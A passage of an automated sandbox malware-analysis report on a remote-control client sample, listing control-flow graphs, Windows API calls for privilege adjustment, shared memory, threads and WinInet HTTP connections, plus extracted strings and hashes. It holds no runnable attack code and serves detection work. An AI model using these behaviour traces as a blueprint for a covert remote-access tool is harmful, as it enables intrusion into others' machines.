861->855 863->864 868 1109eabb-1109eacd CreateEventA 864->868 869 1109eab5 864->869 865->846 865->861 871 1109eacf-1109eaee GetLastError * 2 call 110d6c20 868->871 872 1109eaf1-1109eaf9 868->872 869->868 871->872 874 1109eafb 872->874 875 1109eb01-1109eb12 CreateEventA 872->875 874->875 877 1109eb34-1109eb42 875->877 878 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 875->878 880 1109eb44-1109eb45 LocalFree 877->880 881 1109eb47-1109eb4f 877->881 878->877 880->881 883 1109eb51-1109eb52 LocalFree 881->883 884 1109eb54-1109eb5d 881->884 883->884 885 1109eb63-1109eb66 884->885 886 1109ec07-1109ec19 call 110d6c20 884->886 885->886 888 1109eb6c-1109eb6f 885->888 886->822 888->886 890 1109eb75-1109eb78 888->890 890->886 891 1109eb7e-1109eb81 890->891 892 1109eb8c-1109eba8 CreateThread 891->892 893 1109eb83-1109eb89 GetCurrentThreadId 891->893 894 1109ebaa-1109ebb4 892->894 895 1109ebb6-1109ebc0 892->895 893->892 894->822 896 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 895->896 897 1109ebc2-1109ebd8 ResetEvent * 3 895->897 896->780 897->896
                                                                                  APIs
                                                                                    • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,50D94AA1,00080000,00000000,?), ref: 1109D88D
                                                                                    • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                    • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                    • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                  • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,50D94AA1,00080000,00000000,?), ref: 1109E645
                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                  • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                  • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                  • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                  • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                                  • GetLastError.KERNEL32 ref: 1109E75D
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                  • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                    • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                    • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                  • _memset.LIBCMT ref: 1109E920
                                                                                  • GetTickCount.KERNEL32 ref: 1109E928
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                  • GetLastError.KERNEL32 ref: 1109EA44
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                  • GetLastError.KERNEL32 ref: 1109EA89
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                  • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                  • GetLastError.KERNEL32 ref: 1109EACF
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                  • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                  • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                  • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                  • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                  • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                  • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                  • API String ID: 3291243470-2792520954
                                                                                  • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                  • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                  • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                  • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50
                                                                                  Function 6FA07030 Relevance: 91.4, APIs: 21, Strings: 31, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 902 6fa07030-6fa07050 call 6f9f2a90 call 6fa0dbd0 907 6fa07052-6fa07095 LoadLibraryA 902->907 908 6fa07097 902->908 909 6fa07099-6fa070f8 call 6f9f8d00 InitializeCriticalSection CreateEventA 907->909 908->909 912 6fa07111-6fa0711e CreateEventA 909->912 913 6fa070fa-6fa0710e call 6f9f6f50 909->913 915 6fa07120-6fa07134 call 6f9f6f50 912->915 916 6fa07137-6fa07144 CreateEventA 912->916 913->912 915->916 917 6fa07146-6fa0715a call 6f9f6f50 916->917 918 6fa0715d-6fa07170 WSAStartup 916->918 917->918 922 6fa07172-6fa07182 call 6f9f5290 call 6f9f2b70 918->922 923 6fa07183-6fa071b2 call 6fa11b69 918->923 931 6fa071d0-6fa071e4 call 6fa11c50 923->931 932 6fa071b4-6fa071cd call 6f9f6f50 923->932 938 6fa071e6-6fa071e9 931->938 939 6fa071fa-6fa07202 931->939 932->931 938->939 940 6fa071eb-6fa071f1 938->940 941 6fa07204 939->941 942 6fa07209-6fa07223 call 6fa13753 939->942 940->939 943 6fa071f3-6fa071f8 940->943 941->942 946 6fa07225-6fa07239 call 6f9f6f50 942->946 947 6fa0723c-6fa07255 call 6fa09bf0 942->947 943->942 946->947 952 6fa07257-6fa0725e 947->952 953 6fa0726a-6fa07271 call 6f9f5730 947->953 954 6fa07260-6fa07268 952->954 957 6fa07277-6fa0729a call 6fa11b69 953->957 958 6fa0730b-6fa07310 953->958 954->953 954->954 965 6fa0729c-6fa072bb call 6f9f6f50 957->965 966 6fa072be-6fa072dc call 6fa11c50 call 6fa11b69 957->966 960 6fa07312-6fa07315 958->960 961 6fa0731e-6fa07336 call 6f9f5e90 call 6f9f5530 958->961 960->961 962 6fa07317-6fa0731c 960->962 967 6fa07339-6fa07354 call 6f9f5e90 961->967 962->961 962->967 965->966 983 6fa072fa-6fa07308 call 6fa11c50 966->983 984 6fa072de-6fa072f7 call 6f9f6f50 966->984 977 6fa07361-6fa0738b GetTickCount CreateThread 967->977 978 6fa07356-6fa0735c 967->978 981 6fa073a9-6fa073b6 SetThreadPriority 977->981 982 6fa0738d-6fa073a6 call 6f9f6f50 977->982 978->977 986 6fa073b8-6fa073cc call 6f9f6f50 981->986 987 6fa073cf-6fa073ed call 6f9f5f20 call 6f9f5e90 981->987 982->981 983->958 984->983 986->987 999 6fa073f5-6fa073f7 987->999 1000 6fa073ef 987->1000 1001 6fa07425-6fa07447 GetModuleFileNameA call 6f9f2420 999->1001 1002 6fa073f9-6fa07407 call 6fa0dbd0 999->1002 1000->999 1009 6fa07449-6fa0744a 1001->1009 1010 6fa0744c 1001->1010 1007 6fa07409-6fa0741c call 6f9f4580 1002->1007 1008 6fa0741e 1002->1008 1012 6fa07420 1007->1012 1008->1012 1013 6fa07451-6fa0746d 1009->1013 1010->1013 1012->1001 1014 6fa07470-6fa0747f 1013->1014 1014->1014 1016 6fa07481-6fa07486 1014->1016 1017 6fa07487-6fa0748d 1016->1017 1017->1017 1018 6fa0748f-6fa074c8 GetPrivateProfileIntA GetModuleHandleA 1017->1018 1019 6fa07563-6fa0758f CreateMutexA timeBeginPeriod 1018->1019 1020 6fa074ce-6fa074fa call 6f9f5e90 * 2 1018->1020 1025 6fa07536-6fa0755d call 6f9f5e90 * 2 1020->1025 1026 6fa074fc-6fa07511 call 6f9f5e90 1020->1026 1025->1019 1032 6fa07513-6fa07528 call 6f9f5e90 1026->1032 1033 6fa0752a-6fa07530 1026->1033 1032->1025 1032->1033 1033->1025
                                                                                  APIs
                                                                                    • Part of subcall function 6F9F2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6F9F2ACB
                                                                                    • Part of subcall function 6F9F2A90: _strrchr.LIBCMT ref: 6F9F2ADA
                                                                                    • Part of subcall function 6F9F2A90: _strrchr.LIBCMT ref: 6F9F2AEA
                                                                                    • Part of subcall function 6F9F2A90: wsprintfA.USER32 ref: 6F9F2B05
                                                                                    • Part of subcall function 6FA0DBD0: _malloc.LIBCMT ref: 6FA0DBE9
                                                                                    • Part of subcall function 6FA0DBD0: wsprintfA.USER32 ref: 6FA0DC04
                                                                                    • Part of subcall function 6FA0DBD0: _memset.LIBCMT ref: 6FA0DC27
                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6FA07057
                                                                                  • InitializeCriticalSection.KERNEL32(6FA3B898), ref: 6FA070DF
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FA070EF
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FA07115
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FA0713B
                                                                                  • WSAStartup.WSOCK32(00000101,6FA3B91A), ref: 6FA07167
                                                                                  • _malloc.LIBCMT ref: 6FA071A3
                                                                                    • Part of subcall function 6FA11B69: __FF_MSGBANNER.LIBCMT ref: 6FA11B82
                                                                                    • Part of subcall function 6FA11B69: __NMSG_WRITE.LIBCMT ref: 6FA11B89
                                                                                    • Part of subcall function 6FA11B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6FA1D3C1,6FA16E81,00000001,6FA16E81,?,6FA1F447,00000018,6FA37738,0000000C,6FA1F4D7), ref: 6FA11BAE
                                                                                  • _memset.LIBCMT ref: 6FA071D3
                                                                                  • _calloc.LIBCMT ref: 6FA07214
                                                                                  • _malloc.LIBCMT ref: 6FA0728B
                                                                                  • _memset.LIBCMT ref: 6FA072C1
                                                                                  • _malloc.LIBCMT ref: 6FA072CD
                                                                                  • _memset.LIBCMT ref: 6FA07303
                                                                                  • GetTickCount.KERNEL32 ref: 6FA07361
                                                                                  • CreateThread.KERNEL32(00000000,00004000,6FA06BA0,00000000,00000000,6FA3BACC), ref: 6FA0737E
                                                                                  • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6FA073AC
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Support\,00000104), ref: 6FA07430
                                                                                  • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Support\pci.ini), ref: 6FA074B0
                                                                                  • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6FA074C0
                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6FA07566
                                                                                  • timeBeginPeriod.WINMM(00000001), ref: 6FA07573
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                  • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/#v$648351$C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Support\$C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                  • API String ID: 3160247386-3101628296
                                                                                  • Opcode ID: 006c9210d32aa53bb0c9ba9be0e33eaae5798b684290b40cf2773176055501f2
                                                                                  • Instruction ID: 2945255b5aaf11ce11415c66d41636db99c97e272153fc60387b9fc7b6d655ac
                                                                                  • Opcode Fuzzy Hash: 006c9210d32aa53bb0c9ba9be0e33eaae5798b684290b40cf2773176055501f2
                                                                                  • Instruction Fuzzy Hash: FCD1DAB3D00724AFDB20AF74BC809567BE9FB1635CB44852AF449D7281E739E8D18B91
                                                                                  Function 11029BB0 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1037 11029bb0-11029c3e LoadLibraryA 1038 11029c41-11029c46 1037->1038 1039 11029c48-11029c4b 1038->1039 1040 11029c4d-11029c50 1038->1040 1041 11029c65-11029c6a 1039->1041 1042 11029c52-11029c55 1040->1042 1043 11029c57-11029c62 1040->1043 1044 11029c99-11029ca5 1041->1044 1045 11029c6c-11029c71 1041->1045 1042->1041 1043->1041 1048 11029d4a-11029d4d 1044->1048 1049 11029cab-11029cc3 call 11163a11 1044->1049 1046 11029c73-11029c8a GetProcAddress 1045->1046 1047 11029c8c-11029c8f 1045->1047 1046->1047 1052 11029c91-11029c93 SetLastError 1046->1052 1047->1044 1050 11029d68-11029d80 InternetOpenA 1048->1050 1051 11029d4f-11029d66 GetProcAddress 1048->1051 1058 11029ce4-11029cf0 1049->1058 1059 11029cc5-11029cde GetProcAddress 1049->1059 1055 11029da4-11029db0 call 11163aa5 1050->1055 1051->1050 1054 11029d99-11029da1 SetLastError 1051->1054 1052->1044 1054->1055 1065 11029db6-11029de7 call 11142e60 call 11165250 1055->1065 1066 1102a02a-1102a034 1055->1066 1064 11029cf2-11029cfb GetLastError 1058->1064 1067 11029d11-11029d13 1058->1067 1059->1058 1061 11029d82-11029d8a SetLastError 1059->1061 1061->1064 1064->1067 1068 11029cfd-11029d0f call 11163aa5 call 11163a11 1064->1068 1092 11029de9-11029dec 1065->1092 1093 11029def-11029e04 call 11081d30 * 2 1065->1093 1066->1038 1070 1102a03a 1066->1070 1072 11029d30-11029d3c 1067->1072 1073 11029d15-11029d2e GetProcAddress 1067->1073 1068->1067 1075 1102a04c-1102a04f 1070->1075 1072->1048 1094 11029d3e-11029d47 1072->1094 1073->1072 1077 11029d8f-11029d97 SetLastError 1073->1077 1079 1102a051-1102a056 1075->1079 1080 1102a05b-1102a05e 1075->1080 1077->1048 1081 1102a1bf-1102a1c7 1079->1081 1082 1102a060-1102a065 1080->1082 1083 1102a06a 1080->1083 1090 1102a1d0-1102a1e3 1081->1090 1091 1102a1c9-1102a1ca FreeLibrary 1081->1091 1087 1102a18f-1102a194 1082->1087 1088 1102a06d-1102a075 1083->1088 1098 1102a196-1102a1ad GetProcAddress 1087->1098 1099 1102a1af-1102a1b5 1087->1099 1096 1102a077-1102a08e GetProcAddress 1088->1096 1097 1102a094-1102a09d 1088->1097 1091->1090 1092->1093 1111 11029e06-11029e0a 1093->1111 1112 11029e0d-11029e19 1093->1112 1094->1048 1096->1097 1101 1102a14e-1102a150 SetLastError 1096->1101 1104 1102a0a0-1102a0a2 1097->1104 1098->1099 1102 1102a1b7-1102a1b9 SetLastError 1098->1102 1099->1081 1106 1102a156-1102a15d 1101->1106 1102->1081 1104->1106 1108 1102a0a8-1102a0ad 1104->1108 1109 1102a16c-1102a18d call 11027f00 * 2 1106->1109 1108->1109 1113 1102a0b3-1102a0ef call 11110230 call 11027eb0 1108->1113 1109->1087 1111->1112 1115 11029e44-11029e49 1112->1115 1116 11029e1b-11029e1d 1112->1116 1140 1102a101-1102a103 1113->1140 1141 1102a0f1-1102a0f4 1113->1141 1122 11029e4b-11029e5c GetProcAddress 1115->1122 1123 11029e5e-11029e75 InternetConnectA 1115->1123 1119 11029e34-11029e3a 1116->1119 1120 11029e1f-11029e32 GetProcAddress 1116->1120 1119->1115 1120->1119 1125 11029e3c-11029e3e SetLastError 1120->1125 1122->1123 1127 11029ea1-11029eac SetLastError 1122->1127 1128 1102a017-1102a027 call 11162777 1123->1128 1129 11029e7b-11029e7e 1123->1129 1125->1115 1127->1128 1128->1066 1130 11029e80-11029e82 1129->1130 1131 11029eb9-11029ec1 1129->1131 1135 11029e84-11029e97 GetProcAddress 1130->1135 1136 11029e99-11029e9f 1130->1136 1137 11029ec3-11029ed7 GetProcAddress 1131->1137 1138 11029ed9-11029ef4 1131->1138 1135->1136 1142 11029eb1-11029eb3 SetLastError 1135->1142 1136->1131 1137->1138 1145 11029ef6-11029efe SetLastError 1137->1145 1152 11029f01-11029f04 1138->1152 1143 1102a105 1140->1143 1144 1102a10c-1102a111 1140->1144 1141->1140 1146 1102a0f6-1102a0fa 1141->1146 1142->1131 1143->1144 1148 1102a113-1102a129 call 110d12e0 1144->1148 1149 1102a12c-1102a12e 1144->1149 1145->1152 1146->1140 1147 1102a0fc 1146->1147 1147->1140 1148->1149 1154 1102a130-1102a132 1149->1154 1155 1102a134-1102a145 call 11162777 1149->1155 1156 1102a012-1102a015 1152->1156 1157 11029f0a-11029f0f 1152->1157 1154->1155 1160 1102a15f-1102a169 call 11162777 1154->1160 1155->1109 1171 1102a147-1102a149 1155->1171 1156->1128 1159 1102a03c-1102a049 call 11162777 1156->1159 1162 11029f11-11029f28 GetProcAddress 1157->1162 1163 11029f2a-11029f36 1157->1163 1159->1075 1160->1109 1162->1163 1165 11029f38-11029f40 SetLastError 1162->1165 1170 11029f42-11029f5b GetLastError 1163->1170 1165->1170 1173 11029f76-11029f8b 1170->1173 1174 11029f5d-11029f74 GetProcAddress 1170->1174 1171->1088 1177 11029f95-11029fa3 GetLastError 1173->1177 1174->1173 1175 11029f8d-11029f8f SetLastError 1174->1175 1175->1177 1178 11029fa5-11029faa 1177->1178 1179 11029fac-11029fb8 GetDesktopWindow 1177->1179 1178->1179 1180 1102a002-1102a007 1178->1180 1181 11029fd3-11029fef 1179->1181 1182 11029fba-11029fd1 GetProcAddress 1179->1182 1180->1156 1183 1102a009-1102a00f 1180->1183 1181->1156 1186 11029ff1 1181->1186 1182->1181 1184 11029ff6-1102a000 SetLastError 1182->1184 1183->1156 1184->1156 1186->1152
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll,50D94AA1,762323A0,?,00000000), ref: 11029BE5
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                  • _malloc.LIBCMT ref: 11029CB7
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                  • GetLastError.KERNEL32 ref: 11029CF2
                                                                                  • _free.LIBCMT ref: 11029CFE
                                                                                  • _malloc.LIBCMT ref: 11029D07
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                  • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                  • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                  • _free.LIBCMT ref: 11029DA5
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                  • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                  • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                  • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                  • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                  • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                  • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                  • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                  • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                  • API String ID: 921868004-913974648
                                                                                  • Opcode ID: 7601ca86afd039ac015f256548e9b1f80adfdfe6b294cebcb07e0e75b36e1d34
                                                                                  • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                  • Opcode Fuzzy Hash: 7601ca86afd039ac015f256548e9b1f80adfdfe6b294cebcb07e0e75b36e1d34
                                                                                  • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                  Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                    • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                  • _fgets.LIBCMT ref: 110628E2
                                                                                  • _strpbrk.LIBCMT ref: 11062949
                                                                                  • _fgets.LIBCMT ref: 11062A4C
                                                                                  • _strpbrk.LIBCMT ref: 11062AC3
                                                                                  • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                  • _fgets.LIBCMT ref: 11062B55
                                                                                  • _strpbrk.LIBCMT ref: 11062B7B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
